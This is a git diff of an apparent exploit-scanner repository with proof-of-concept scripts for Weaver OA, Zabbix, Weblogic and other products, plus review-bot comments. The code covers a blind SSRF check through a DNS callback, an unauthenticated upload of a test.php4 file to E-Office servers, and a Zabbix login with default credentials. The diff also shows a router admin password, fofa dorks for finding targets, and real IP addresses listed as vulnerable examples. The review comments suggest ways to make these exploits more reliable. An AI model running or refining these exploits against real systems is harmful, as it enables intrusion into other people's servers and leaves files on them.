+ 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
+
+ 不存在漏洞:vuln = [False,""]
+ """
+ vuln = [False,""]
+ url = self.target + "/casa/nodes/thumbprints" # url自己按需调整
+
+ success,dns_flag = get_ceye_dns()
+ if success == False:
+ return [False,dns_flag]
+
+ data = """["%s"]""" % (dns_flag)
+
+ headers = {"User-Agent":get_random_ua(),
+ "Connection":"close",
+ "Content-Type": "application/json;charset=UTF-8",
+ }
+
+ try:
+ """
+ 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
+ """
+ req = requests.post(url,data=data,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
+
+ flager = verify_ceye_dns(dns_flag)
+
+ if flager == True:
+ vuln = [True,dns_flag]
+ elif flager == False:
+ vuln = [False,dns_flag]
+ else:
+ vuln = [False,flager]
+ except Exception as e:
+ raise e
+
+ # 以下逻辑酌情使用
+ if self._honeypot_check(vuln[1]) == True:
+ vuln[0] = False
+
+ return vuln
+
+ def _attack(self):
+ return self._verify()
\ No newline at end of file
diff --git a/poc/Venustech_启明星辰/SQLi_Reportguide/__pycache__/poc.cpython-38.pyc b/poc/Venustech_启明星辰/SQLi_Reportguide/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..53c0499
Binary files /dev/null and b/poc/Venustech_启明星辰/SQLi_Reportguide/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Venustech_启明星辰/SQLi_Reportguide/poc.py b/poc/Venustech_启明星辰/SQLi_Reportguide/poc.py
index ee0477b..541b37c 100644
--- a/poc/Venustech_启明星辰/SQLi_Reportguide/poc.py
+++ b/poc/Venustech_启明星辰/SQLi_Reportguide/poc.py
@@ -19,7 +19,7 @@ class POC(POCBase):
 """, # POC描述,写更新描述,没有就不写
 "name" : "天玥运维网关/网御网络审计 Sql注入漏洞", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
 "AppName" : "", # 漏洞应用名称
 "AppVersion" : """
 天玥运维安全网关V6.0
diff --git a/poc/VoIPmonitor/RCE_CVE_2021_30461/__pycache__/poc.cpython-38.pyc b/poc/VoIPmonitor/RCE_CVE_2021_30461/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..9e98f28
Binary files /dev/null and b/poc/VoIPmonitor/RCE_CVE_2021_30461/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/WayosAC/WayosAC/__pycache__/poc.cpython-38.pyc b/poc/WayosAC/WayosAC/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..b838c0c
Binary files /dev/null and b/poc/WayosAC/WayosAC/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/WayosAC/poc.py b/poc/WayosAC/WayosAC/poc.py
similarity index 100%
rename from poc/WayosAC/poc.py
rename to poc/WayosAC/WayosAC/poc.py
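Review bot: A blind SSRF whose outbound fetch hangs makes `requests.post` raise a timeout, and the `except Exception as e: raise e` block then propagates it before `verify_ceye_dns(dns_flag)` is ever called, so a DNS hit that has already been logged is reported as an error instead of a finding; for this check the DNS log is the oracle, not the HTTP response, so a timed-out post should fall through to the DNS lookup. `raise e` inside the except also rewrites the traceback (bare `raise` is the idiom), and `req` and the imported `url_handle` are never used. Separately, `_honeypot_check(vuln[1])` receives the DNS token rather than any page content, which looks unable to do anything useful — confirm what that helper expects. The rewrite below keeps a request failure from masking the DNS result:
```python
try:
    # a hung or refused outbound fetch is normal for a blind SSRF; only the DNS log matters
    requests.post(url, data=data, headers=headers, proxies=self.proxy, timeout=self.timeout, verify=False)
except requests.exceptions.Timeout:
    pass  # fall through: the target may already have resolved dns_flag
flager = verify_ceye_dns(dns_flag)
# … unchanged: flager -> vuln mapping, honeypot check, return vuln …
```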
diff --git a/poc/Weaver_泛微OA/Config_Info_Disclosure_DBconfigReader/__pycache__/poc.cpython-38.pyc b/poc/Weaver_泛微OA/Config_Info_Disclosure_DBconfigReader/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..3550e66
Binary files /dev/null and b/poc/Weaver_泛微OA/Config_Info_Disclosure_DBconfigReader/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Weaver_泛微OA/Config_Info_Disclosure_DBconfigReader/poc.py b/poc/Weaver_泛微OA/Config_Info_Disclosure_DBconfigReader/poc.py
index 80250d6..0683c9e 100644
--- a/poc/Weaver_泛微OA/Config_Info_Disclosure_DBconfigReader/poc.py
+++ b/poc/Weaver_泛微OA/Config_Info_Disclosure_DBconfigReader/poc.py
@@ -4,7 +4,6 @@ from lib.core.common import url_handle,get_random_ua
 from lib.core.poc import POCBase
 # ...
 import urllib3
-import pyDes
 urllib3.disable_warnings()
 class POC(POCBase):
@@ -22,7 +21,7 @@ class POC(POCBase):
 """, # POC描述,写更新描述,没有就不写
 "name" : "泛微 e-cology OA 数据库配置信息泄露漏洞", # 漏洞名称
- "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
 "AppName" : "泛微 e-cology", # 漏洞应用名称
 "AppVersion" : "目前已知为8.100.0531,不排除其他版本,包括不限于EC7.0、EC8.0", # 漏洞应用版本
 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
@@ -84,4 +83,4 @@ class POC(POCBase):
 return vuln
 def _attack(self):
- return self._verify()
\ No newline at end of file
+ return self._verify()
diff --git a/poc/Weaver_泛微OA/Config_Info_Disclosure_E_Cology_V9/__pycache__/poc.cpython-38.pyc b/poc/Weaver_泛微OA/Config_Info_Disclosure_E_Cology_V9/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..b39a78b
Binary files /dev/null and b/poc/Weaver_泛微OA/Config_Info_Disclosure_E_Cology_V9/__pycache__/poc.cpython-38.pyc differ
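Review bot: `import pyDes` is removed from the module header, but the body of `_verify` that presumably consumed it (a third-party DES library is not imported for decoration) is outside every hunk of this file, and nothing in the diff replaces the call; if a `pyDes.des(...)` reference remains further down, the POC now dies with `NameError` on first use rather than at import. Grep this file for `pyDes` before merging, and if the decryption moved into `lib.core.common`, a one-line note at the import site (`# DES decode of the DBconfigReader blob now lives in lib.core.common`) saves the next reader the same question. The other two hunks here are a placeholder-ID rename and a trailing-newline fix.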
diff --git a/poc/Weaver_泛微OA/Config_Info_Disclosure_E-cology_V9/poc.py b/poc/Weaver_泛微OA/Config_Info_Disclosure_E_Cology_V9/poc.py similarity index 100% rename from poc/Weaver_泛微OA/Config_Info_Disclosure_E-cology_V9/poc.py rename to poc/Weaver_泛微OA/Config_Info_Disclosure_E_Cology_V9/poc.py diff --git a/poc/Weaver_泛微OA/File_Read_E_Bridge/__pycache__/poc.cpython-38.pyc b/poc/Weaver_泛微OA/File_Read_E_Bridge/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..8d18419 Binary files /dev/null and b/poc/Weaver_泛微OA/File_Read_E_Bridge/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Weaver_泛微OA/File_Read_E_Bridge/poc.py b/poc/Weaver_泛微OA/File_Read_E_Bridge/poc.py index 7ae0ab4..a84702e 100644 --- a/poc/Weaver_泛微OA/File_Read_E_Bridge/poc.py +++ b/poc/Weaver_泛微OA/File_Read_E_Bridge/poc.py @@ -20,7 +20,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "泛微云桥 e-Bridge 任意文件读取漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "泛微云桥 e-Bridge", # 漏洞应用名称 "AppVersion" : "泛微云桥 e-Bridge 2018-2019 多个版本", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Weaver_泛微OA/File_Upload_E_Office_V9_CNVD_2021_49104/__pycache__/poc.cpython-38.pyc b/poc/Weaver_泛微OA/File_Upload_E_Office_V9_CNVD_2021_49104/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..7a9c171 Binary files /dev/null and b/poc/Weaver_泛微OA/File_Upload_E_Office_V9_CNVD_2021_49104/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Weaver_泛微OA/File_Upload_E_Office_V9_CNVD_2021_49104/poc.py b/poc/Weaver_泛微OA/File_Upload_E_Office_V9_CNVD_2021_49104/poc.py index 78caf79..b819bc3 100644 --- a/poc/Weaver_泛微OA/File_Upload_E_Office_V9_CNVD_2021_49104/poc.py +++ b/poc/Weaver_泛微OA/File_Upload_E_Office_V9_CNVD_2021_49104/poc.py 
@@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "泛微OA E-Office V9文件上传漏洞(CNVD-2021-49104)", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "泛微OA E-Office", # 漏洞应用名称 "AppVersion" : "E-Office V9", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Weaver_泛微OA/File_Upload_E_Office_ajax/__pycache__/poc.cpython-38.pyc b/poc/Weaver_泛微OA/File_Upload_E_Office_ajax/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..a982fe8 Binary files /dev/null and b/poc/Weaver_泛微OA/File_Upload_E_Office_ajax/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Weaver_泛微OA/Sql_inj_E_Office_V9/poc.py b/poc/Weaver_泛微OA/File_Upload_E_Office_ajax/poc.py similarity index 57% rename from poc/Weaver_泛微OA/Sql_inj_E_Office_V9/poc.py rename to poc/Weaver_泛微OA/File_Upload_E_Office_ajax/poc.py index 8c1734f..01a195b 100644 --- a/poc/Weaver_泛微OA/Sql_inj_E_Office_V9/poc.py +++ b/poc/Weaver_泛微OA/File_Upload_E_Office_ajax/poc.py @@ -1,6 +1,6 @@ # coding:utf-8 import requests -from lib.core.common import url_handle,get_random_ua +from lib.core.common import url_handle,get_random_ua,random_str from lib.core.poc import POCBase import re # ... @@ -10,17 +10,17 @@ urllib3.disable_warnings() class POC(POCBase): _info = { - "author" : "hansi", # POC作者 + "author" : "jijue", # POC作者 "version" : "1", # POC版本,默认是1 "CreateDate" : "2022-1-10", # POC创建时间 "UpdateDate" : "2022-1-10", # POC创建时间 "PocDesc" : """ - 原POC逻辑过于简单,存在大量误报,现已优化 + """, # POC描述,写更新描述,没有就不写 - "name" : "泛微e-office存在前台文件上传漏洞" , # 漏洞名称 + "name" : "泛微E-Office存在前台文件上传漏洞" , # 漏洞名称 "VulnID" : "", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 - "AppName" : "泛微-EOffice", # 漏洞应用名称 + "AppName" : "泛微 E-Office", # 漏洞应用名称 "AppVersion" : "无", # 漏洞应用版本 "VulnDate" : "2021-03-10", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx "VulnDesc" : """ 
@@ -28,9 +28,9 @@ class POC(POCBase): """ , # 漏洞简要描述 "fofa-dork":"" , """ - app="泛微-EOffice" + """ # fofa搜索语句 - "example" : "http://219.153.106.177:81/", # 存在漏洞的演示url,写一个就可以了 + "example" : "", # 存在漏洞的演示url,写一个就可以了 "exp_img" : "", # 先不管 } 
@@ -46,32 +46,38 @@ class POC(POCBase): 不存在漏洞:vuln = [False,""] """ vuln = [False,""] - url = self.target + "/E-mobile/App/Ajax/ajax.php?action=mobile_upload_save" # url自己按需调整 - # date="command1=shell:ifconfig| dd of=/tmp/a.txt" + url0 = self.target + "/E-mobile/App/Ajax/ajax.php?action=mobile_upload_save" # url0自己按需调整 headers = {"User-Agent":get_random_ua(), "Connection":"close", - # "Content-Type": "application/x-www-form-urlencoded", + "Content-Type": "multipart/form-data; boundary=12f83ada5e3c205e29da579b538944ff", } - data = """Content-Type: multipart/form-data; boundary=12f83ada5e3c205e29da579b538944ff - + flag = random_str() + data = """ --12f83ada5e3c205e29da579b538944ff Content-Disposition: form-data; name="upload_quwan"; filename="test.php4" Content-Type: application/octet-stream - + --12f83ada5e3c205e29da579b538944ff -""" +""".format(flag=flag) try: """ 检测逻辑,漏洞存在则修改vuln值,漏洞不存在则不动 """ - req = requests.post(url,headers = headers , data = data, proxies = self.proxy , timeout = self.timeout,verify = False) - result = re.match("\[\d,\".+\",\d{10},\"\.\"\]",req.text.strip()) - if req.status_code == 200 and result != None: - vuln = [True,req.text] + req0 = requests.post(url0,headers = headers , data = data, proxies = self.proxy , timeout = self.timeout,verify = False) + reg = """\[\d,".+",\d+.".+.php4"]""" + result = re.match(reg,req0.text.strip()) + if req0.status_code == 200 and result : + urls = result.group()[1:-1].split(",") + dic1 = urls[2].strip("\"") + dic2 = urls[3].strip("\"") + url1 = self.target + "/attachment//" + dic1 + "//" + dic2 + req1 = requests.get(url1,headers = headers , proxies = self.proxy , timeout = self.timeout,verify = False) + if req1.status_code == 200 and flag in req1.text: + vuln = [True,req1.text] else: - vuln = [False,req.text] + vuln = [False,req0.text] except Exception as e: raise e @@ -80,6 +86,5 @@ Content-Type: application/octet-stream return vuln - def _attack(self): return self._verify() \ No newline at end of file 
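Review bot: `_verify` now uploads `test.php4` into the target's `attachment` directory and never removes it, and `_attack` (context in the second hunk on this line) is just `return self._verify()`, so every scan leaves an executable-extension file behind on a customer system; say so in `PocDesc` (emptied in an earlier hunk of this file) and consider a cleanup step or a harmless extension once the upload path has been confirmed. The success test `if req1.status_code == 200 and flag in req1.text:` is also satisfied when the server returns the uploaded source verbatim instead of executing it, so it proves the file is stored and reachable, not that `.php4` runs — the payload line itself is not legible in this rendering, so decide which claim the POC makes and check for it. The hand-built multipart body uses bare newlines and its closing `--12f83ada5e3c205e29da579b538944ff` has no `--` terminator; `requests` builds a correct body from `files={"upload_quwan": ("test.php4", payload, "application/octet-stream")}` and sets Content-Type itself, which also stops the multipart header being reused on the later GET. `urls[2]`/`urls[3]` from `result.group()[1:-1].split(",")` raise `IndexError` if either returned field contains a comma; a `len(urls) >= 4` guard is cheaper than a traceback.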
diff --git a/poc/Weaver_泛微OA/File_Upload_V9_uploadOperation/__pycache__/poc.cpython-38.pyc b/poc/Weaver_泛微OA/File_Upload_V9_uploadOperation/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..e90bf74 Binary files /dev/null and b/poc/Weaver_泛微OA/File_Upload_V9_uploadOperation/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Weaver_泛微OA/File_Upload_V9_uploadOperation/poc.py b/poc/Weaver_泛微OA/File_Upload_V9_uploadOperation/poc.py index c671f5f..e2a1c3d 100644 --- a/poc/Weaver_泛微OA/File_Upload_V9_uploadOperation/poc.py +++ b/poc/Weaver_泛微OA/File_Upload_V9_uploadOperation/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "泛微V9 前台文件上传漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "泛微V9", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Weaver_泛微OA/Log_Disclosure/__pycache__/poc.cpython-38.pyc b/poc/Weaver_泛微OA/Log_Disclosure/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..05e4dca Binary files /dev/null and b/poc/Weaver_泛微OA/Log_Disclosure/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Weaver_泛微OA/Log_Disclosure/poc.py b/poc/Weaver_泛微OA/Log_Disclosure/poc.py index 27797cc..4f7e82f 100644 --- a/poc/Weaver_泛微OA/Log_Disclosure/poc.py +++ b/poc/Weaver_泛微OA/Log_Disclosure/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "泛微OA 日志泄露", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "泛微oa", # 漏洞应用名称 "AppVersion" : "未知", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx 
diff --git a/poc/Weaver_泛微OA/RCE_Beanshell/__pycache__/poc.cpython-38.pyc b/poc/Weaver_泛微OA/RCE_Beanshell/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..407d7e8 Binary files /dev/null and b/poc/Weaver_泛微OA/RCE_Beanshell/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Weaver_泛微OA/RCE_Beanshell/poc.py b/poc/Weaver_泛微OA/RCE_Beanshell/poc.py index d6e7fd0..f32ea04 100644 --- a/poc/Weaver_泛微OA/RCE_Beanshell/poc.py +++ b/poc/Weaver_泛微OA/RCE_Beanshell/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "泛微OA Beanshell 远程代码执行漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "泛微e-cology OA系统", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Weaver_泛微OA/SQLi_E_Office_v9dot5/__pycache__/poc.cpython-38.pyc b/poc/Weaver_泛微OA/SQLi_E_Office_v9dot5/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..a59d9dd Binary files /dev/null and b/poc/Weaver_泛微OA/SQLi_E_Office_v9dot5/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Weaver_泛微OA/Sql_inj_E_office_V9.5/poc.py b/poc/Weaver_泛微OA/SQLi_E_Office_v9dot5/poc.py similarity index 98% rename from poc/Weaver_泛微OA/Sql_inj_E_office_V9.5/poc.py rename to poc/Weaver_泛微OA/SQLi_E_Office_v9dot5/poc.py index b7df963..2cae2d3 100644 --- a/poc/Weaver_泛微OA/Sql_inj_E_office_V9.5/poc.py +++ b/poc/Weaver_泛微OA/SQLi_E_Office_v9dot5/poc.py @@ -14,7 +14,7 @@ class POC(POCBase): "CreateDate" : "2022-01-15", # POC创建时间 "UpdateDate" : "2022-01-15", # POC创建时间 "PocDesc" : """ - 略 + 略 """, # POC描述,写更新描述,没有就不写 "name" : "泛微E-office V9.5 SQL注入漏洞", # 漏洞名称 @@ -27,7 +27,7 @@ class POC(POCBase): """, # 漏洞简要描述 "fofa-dork":""" - app="泛微-EOffice" + app="泛微-EOffice" """, # fofa搜索语句 "example" : "", # 存在漏洞的演示url,写一个就可以了 "exp_img" : "", # 先不管 
diff --git a/poc/Weaver_泛微OA/Sql_Inj_E_cology_WorkflowCenterTreeData/__pycache__/poc.cpython-38.pyc b/poc/Weaver_泛微OA/Sql_Inj_E_cology_WorkflowCenterTreeData/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..0b1f74d Binary files /dev/null and b/poc/Weaver_泛微OA/Sql_Inj_E_cology_WorkflowCenterTreeData/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Weaver_泛微OA/Sql_Inj_E_cology_WorkflowCenterTreeData/poc.py b/poc/Weaver_泛微OA/Sql_Inj_E_cology_WorkflowCenterTreeData/poc.py index be5b119..e42bdbf 100644 --- a/poc/Weaver_泛微OA/Sql_Inj_E_cology_WorkflowCenterTreeData/poc.py +++ b/poc/Weaver_泛微OA/Sql_Inj_E_cology_WorkflowCenterTreeData/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "泛微 E-cology WorkflowCenterTreeData.jsp文件 前台SQL注入漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "泛微 e-cology OA 系统", # 漏洞应用名称 "AppVersion" : "使用oracle数据库的泛微 e-cology OA 系统", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Weaver_泛微OA/Sql_inj_E_cology_V8/__pycache__/poc.cpython-38.pyc b/poc/Weaver_泛微OA/Sql_inj_E_cology_V8/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..f1c6057 Binary files /dev/null and b/poc/Weaver_泛微OA/Sql_inj_E_cology_V8/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Weblogic/CVE_2016_0638/__pycache__/poc.cpython-38.pyc b/poc/Weblogic/CVE_2016_0638/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..e84372d Binary files /dev/null and b/poc/Weblogic/CVE_2016_0638/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Weblogic/CVE_2017_10271/__pycache__/poc.cpython-38.pyc b/poc/Weblogic/CVE_2017_10271/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..1f71873 Binary files /dev/null and b/poc/Weblogic/CVE_2017_10271/__pycache__/poc.cpython-38.pyc differ 
diff --git a/poc/Weblogic/RCE_CVE_2018_3191/__pycache__/poc.cpython-38.pyc b/poc/Weblogic/RCE_CVE_2018_3191/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..eebf27e Binary files /dev/null and b/poc/Weblogic/RCE_CVE_2018_3191/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Weblogic/SSRF_CVE_2014_4210/__pycache__/poc.cpython-38.pyc b/poc/Weblogic/SSRF_CVE_2014_4210/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..e3de184 Binary files /dev/null and b/poc/Weblogic/SSRF_CVE_2014_4210/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Weblogic/UnAuth_RCE_CVE_2020_14882/__pycache__/poc.cpython-38.pyc b/poc/Weblogic/UnAuth_RCE_CVE_2020_14882/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..d160cbe Binary files /dev/null and b/poc/Weblogic/UnAuth_RCE_CVE_2020_14882/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Weblogic/XMLDecoder_CVE_2017_3506/__pycache__/poc.cpython-38.pyc b/poc/Weblogic/XMLDecoder_CVE_2017_3506/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..1eca778 Binary files /dev/null and b/poc/Weblogic/XMLDecoder_CVE_2017_3506/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Weblogic/XMLDecoder_CVE_2017_3506/poc.py b/poc/Weblogic/XMLDecoder_CVE_2017_3506/poc.py index 48193e7..c1e9ac8 100644 --- a/poc/Weblogic/XMLDecoder_CVE_2017_3506/poc.py +++ b/poc/Weblogic/XMLDecoder_CVE_2017_3506/poc.py @@ -9,7 +9,7 @@ urllib3.disable_warnings() class POC(POCBase): _info = { - "author" : "", # POC作者 + "author" : "jijue", # POC作者 "version" : "1", # POC版本,默认是1 "CreateDate" : "2021-06-09", # POC创建时间 "UpdateDate" : "2021-06-09", # POC创建时间 @@ -43,7 +43,9 @@ class POC(POCBase): def _verify(self): """ 返回vuln + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + 不存在漏洞:vuln = [False,""] """ vuln = [False,""] 
diff --git a/poc/Yonyou_用友NC/Dir_List_ERP/__pycache__/poc.cpython-38.pyc b/poc/Yonyou_用友NC/Dir_List_ERP/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..77782e6 Binary files /dev/null and b/poc/Yonyou_用友NC/Dir_List_ERP/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Yonyou_用友NC/RCE_BeanShell_CNVD_2021_30167/__pycache__/poc.cpython-38.pyc b/poc/Yonyou_用友NC/RCE_BeanShell_CNVD_2021_30167/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..d500c54 Binary files /dev/null and b/poc/Yonyou_用友NC/RCE_BeanShell_CNVD_2021_30167/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Yonyou_用友NC/Sqli_CNNVD_201610_923/__pycache__/poc.cpython-38.pyc b/poc/Yonyou_用友NC/Sqli_CNNVD_201610_923/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..8794e2c Binary files /dev/null and b/poc/Yonyou_用友NC/Sqli_CNNVD_201610_923/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Zabbix/Weak_Pass/__pycache__/poc.cpython-38.pyc b/poc/Zabbix/Weak_Pass/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..2448a58 Binary files /dev/null and b/poc/Zabbix/Weak_Pass/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/China_TeleCOM_中国电信/MAC1200R_Weak_Pass/poc.py b/poc/Zabbix/Weak_Pass/poc.py similarity index 55% rename from poc/China_TeleCOM_中国电信/MAC1200R_Weak_Pass/poc.py rename to poc/Zabbix/Weak_Pass/poc.py index 98516ad..6e09708 100644 --- a/poc/China_TeleCOM_中国电信/MAC1200R_Weak_Pass/poc.py +++ b/poc/Zabbix/Weak_Pass/poc.py 
@@ -9,34 +9,30 @@ urllib3.disable_warnings() class POC(POCBase): _info = { - "author" : "hansi", # POC作者 + "author" : "jijue", # POC作者 "version" : "1", # POC版本,默认是1 - "CreateDate" : "2022-02-24", # POC创建时间 - "UpdateDate" : "2022-02-24", # POC创建时间 + "CreateDate" : "2021-06-09", # POC创建时间 + "UpdateDate" : "2021-06-09", # POC创建时间 "PocDesc" : """ 略 """, # POC描述,写更新描述,没有就不写 - "name" : "MAC1200R电信定制版弱口令", # 漏洞名称 - "VulnID" : "", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 - "AppName" : "MAC1200R电信定制版是一款路由", # 漏洞应用名称 + "name" : "Zabbix弱口令", # 漏洞名称 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "Zabbix", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 - "VulnDate" : "2022-02-24", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx "VulnDesc" : """ - 通过相关系统测试发现MAC1200R电信定制版存在弱口令。黑客可利用漏洞获取敏感信息、并进一步控制该设备、或者对系统造成破坏。 + zabbix默认口令是 Admin : zabbix """, # 漏洞简要描述 "fofa-dork":""" - "MAC1200R电信定制" - + app="ZABBIX-监控系统" """, # fofa搜索语句 - "example" : "http://117.172.135.8:8888/", # 存在漏洞的演示url,写一个就可以了 + "example" : "", # 存在漏洞的演示url,写一个就可以了 "exp_img" : "", # 先不管 } - # timeout = 10 - - def _verify(self): """ 返回vuln 
@@ -47,22 +43,26 @@ class POC(POCBase): """ vuln = [False,""] url = self.target + "" # url自己按需调整 + data = "name=Admin&password=zabbix&autologin=1&enter=Sign+in" - headers = {"User-Agent":get_random_ua(), + headers = { + "User-Agent":get_random_ua(), "Connection":"close", "Content-Type": "application/x-www-form-urlencoded", } - data = """ - {"method":"do","login":{"username":"telecomadmin","password":"iLKqgcKP9TefbwK"}} - - """ try: """ 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 """ - req = requests.post(url,headers = headers , data = data ,proxies = self.proxy ,timeout = self.timeout,verify = False) - if req.status_code == 200 and "stok" in req.text: + req = requests.post(url,data=data,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) + if "chkbxRange.init();" in req.text \ + and \ + "incorrect" not in req.text \ + and \ + "" not in req.text \ + and \ + req.status_code == 200: vuln = [True,req.text] else: vuln = [False,req.text] @@ -76,5 +76,4 @@ class POC(POCBase): return vuln def _attack(self): - return self._verify() - + return self._verify() \ No newline at end of file diff --git a/poc/Zentao_禅道/Getshell_test/__pycache__/poc.cpython-38.pyc b/poc/Zentao_禅道/Getshell_test/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..ccc25c8 Binary files /dev/null and b/poc/Zentao_禅道/Getshell_test/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Zentao_禅道/Getshell_test/poc.py b/poc/Zentao_禅道/Getshell_test/poc.py index 0e8fb44..cc938be 100644 --- a/poc/Zentao_禅道/Getshell_test/poc.py +++ b/poc/Zentao_禅道/Getshell_test/poc.py @@ -21,7 +21,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "禅道8.2-9.2.1注入GetShell", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 